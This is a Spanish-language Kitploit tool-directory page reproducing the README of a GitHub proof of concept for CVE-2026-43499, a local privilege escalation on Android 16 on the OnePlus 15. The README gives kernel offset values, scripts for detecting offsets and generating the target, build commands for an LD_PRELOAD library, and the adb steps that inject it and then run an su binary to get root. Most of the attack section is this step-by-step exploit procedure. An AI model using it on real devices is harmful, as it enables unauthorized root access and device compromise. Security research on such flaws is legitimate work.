Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-43499-OnePlus15 — Prueba de concepto educativa para la escalada de privilegios local en Android 16 en OnePlus 15, con detección de desplazamientos del kernel, generación de objetivos y compilación del exploit basada en LD_PRELOAD. | Kitploit
Herramientas/GitHubGitHub/bartixxx32/cve-2026-43499-oneplus15
Seguridad AndroidEscalada de PrivilegiosExplotaciónSeguridad MóvilAprendizaje y EducaciónDesarrollo de PayloadsExplotación de Binarios
GitHubbartixxx32/cve-2026-43499-oneplus15

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-43499-OnePlus15

Prueba de concepto educativa para la escalada de privilegios local en Android 16 en OnePlus 15, con detección de desplazamientos del kernel, generación de objetivos y compilación del exploit basada en LD_PRELOAD.

Ver Repositorio
635hace 1 mesAún no revisado

CVE-2026-43499 — OnePlus 15 LPE (PoC educativo)

ADVERTENCIA: Este repositorio se proporciona únicamente con fines educativos y de investigación. No se distribuyen binarios precompilados ni versiones. Debes compilar todo desde el código fuente.

Escalación de privilegios local en Android 16 para OnePlus 15.

Fork de x-spy/CVE-2026-43499-popsicle con una corrección de alineación de kallsyms y un perfil verificado para OnePlus 15.

Perfil

El perfil contiene dos direcciones físicas que deben confirmarse desde un dispositivo rooteado que ejecute el mismo firmware:

root@kitploit:~
{
  "p0_phys_offset": "0x80000000",
  "p0_kernel_phys_load": "0xc7800000"
}

Detección automática con un dispositivo rooteado:

root@kitploit:~
python3 detect_offset.py

Generar target

Requiere Python 3 y llvm-objdump:

root@kitploit:~
python3 generate_target.py \
  --boot boot.img \
  --profile profile_oneplus15.json \
  -o source/src/target.h

Compilar

root@kitploit:~
make -C source clean preload

Si NDK no se detecta automáticamente:

root@kitploit:~
NDK_ROOT=/path/to/android-ndk make -C source clean preload

Salida: source/build/bin/preload.so

Ejecutar

root@kitploit:~
adb push source/build/bin/preload.so /data/local/tmp/preload.so
adb shell chmod 0644 /data/local/tmp/preload.so
adb shell LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true
adb shell /data/local/tmp/su -c id

Créditos

  • x-spy por el exploit original y el descubrimiento de CVE.
Descargar herramienta